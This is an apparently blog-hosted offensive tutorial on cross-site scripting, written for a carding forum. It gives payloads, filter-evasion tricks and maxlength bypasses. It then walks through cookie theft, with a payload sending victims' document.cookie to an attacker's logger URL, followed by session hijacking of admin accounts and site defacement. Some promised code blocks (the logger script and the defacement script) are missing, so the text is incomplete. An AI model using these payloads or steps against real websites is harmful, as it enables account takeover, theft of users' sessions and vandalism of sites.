Cross-site scripting (XSS), it should have been CSS but that name is already taken by Cascade-Style Sheets so it became XSS, is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls, steal cookies or other types of malicious activities. They are very common nowadays. - Wikipedia (http://en.wikipedia.org/wiki/Cross-site_scripting)
II. XSS'ing
1. How to test for XSS?
The easiest way to find an XSS flaw is to find a text input field on website/application you currently are viewing. Very common XSS injection locations are username, signature or other contact fields and/or the search field.
Once you select a field you can input a test cross-site scripting injection. Enter <script>alert(1337)</script> or "><script>alert(1337)</script> (bypasses some protections) in the select form or field (search one for e.g.). It should return a popup alert containing the number 1337. Some websites might have protection measures so you can use various obfuscation methods to bypass the restrictions, a very good resource is the XSS cheat sheet - http://ha.ckers.org/xss.html
2. Filter Evasion
Sometimes your forms would be patched in some way (will have restrictions on characters, specific inputs etc.) but most of the time they do poor quality protections.
Scenario 1: If it returns a blank/empty reflection or an "Invalid Input" error then the website is most likely blocking the keywords <script> and </script>. You can bypass this filter simply by changing the case of the script tag. For example, <SCRIPT>alert(1337)</SCRIPT> or <ScripT>alert(1337)</ScripT>.
Scenario 2: If it returns your script with quotes around it ("<script>alert(1337)</script>") then you can attempt to close the quotes before you start the script. You can do this by adding "> before the script. For example, "><script>alert(1337)</alert> (as shown above). Quotes are "negative" factors because when placed around the script they convert the script to plain text and don't allow it to function.
Scenario 3: If it returns your script without the <script> tag(only alert(1337)) then it is only removing the tags and not considering the whole input invalid. To bypass this just add another tag around the <script> tag. For example, <sc<script>ript>alert(1337)</sc</script>ript>. The filter will automatically remove the tag covering your input, therefore only <script>alert(1337)</script> will remain.
Scenario 4: If the website simply won't allow you to post the script tags or the alert you can attempt to encode your script into hex. You can do this by using Xlate or any other free ASCII to hex converter. Once you get the hex version of the script you can enter it in just as you would do with the ASCII version of the script and it will have the same outcome.
3. MaxLength limitations
In many cases input fields will have a limit to the amount of characters that can be entered and sometimes your script will exceed that limit. There are a few methods that can be used to bypass this:
Method 1: On some websites you will be able to increase the maximum amount of characters allowed. To change the MaxLength perform the following steps:
1. Right click on the input field
2. Click 'inspect element'
3. Find the line which holds <input id="query" type="text" maxlength="10" size="13" name="search_term" class="input_text"> and increase the number after maxlength=".
4. Submit the form. If it returns an error stating that the information entered in the form was faulty then the website is not vulnerable to this.
Method 2: Upload the script to your server and enter it to use as the source. There are two ways to do this:
1. <img src='http://urfreehosting./wootscript.js'></img>
2. <script src='http://urfreehosting.com/wootscript.js'></script>
4. Attack Vectors
There are two main types of XSS vulnerabilities, reflected and persistent. A reflected XSS is one in which you fill out an input field of something like a search bar, email subscription field, or anything else that won't permanently remain on the website and will disappear as soon as you leave the page. These will take effect with the help of Social Engineering. A persistent XSS vulnerability is used in locations on a website such as a comment field, public profile information or anything else that will remain on-site and visible to other people.
If you find a persistent XSS on a website you will be able to run any script that you want which includes having the ability to deface that certain page(which I assume that the majority of you reading this want).
If you find a reflective XSS you'll be able to run scripts on the site like cookie stealing and CSRF but it will require some social engineering. I consider cookie stealing very useful and will explain why further on in this tutorial but I will also show you how to deface a website via a persistent XSS vulnerability.
Cookie Stealing
1. Find a vulnerable XSSi location on the website. We'll use Site.com/search.word?=(Script Here).
2. Upload your cookie to a web server. You can use a paid web host like Go Daddy and Host Gator or a free one like t35.com, x10hosting.com or any other.
3. Open notepad and paste the following:
4. Upload l0gg3r.php to the root folder of your web server.
5. Add a file named log.txt to the root folder as well.
6. Add the following script to your XSS injectable URL (replace urfreesitehosting.com/l0gg3r.php with your site/l0gg3r.php).
victimexample.net/search.php?word=<script>document.location="http://www.urfreesitehosting.com/l0gg3r.php?cookie=" + document.cookie;</script>
If you don't want your target to see the script you can encode it into hex just like Scenario 4 of Filter Evasion. Only encode the script (everything after victimexample.net/search?word= ).
8. You have successfully logged their cookies! Site.com has sent them to your logger and you now have their site.com cookies. Now gather their PHPSESSID or any other session ID cookie that you've logged.
9. Download the add-on "Edit This Cookie" for Google Chrome and Mozilla Firefox.
10. Go to edit this cookie and replace your session ID with their's. Now click 'Submit Cookie Changes'. You should now be logged in to the admin's/target's account. You can now do anything that doesn't require you to enter their password from making a post or sending a Private Message to (if you're on an administrator account) deleting threads, maybe defacing the website, or banning members.
5. Defacing or how to be a douchebag skid
Find a persistent XSS and enter the following script:
III. Future improvements
I wrote this guide a lot of time ago and I finally to improve and add content especially for carder.pro . It will be updated and more interesting attacks will be added. If you have any suggestions/feedback/criticism please leave a comment.
Комментариев нет:
Отправить комментарий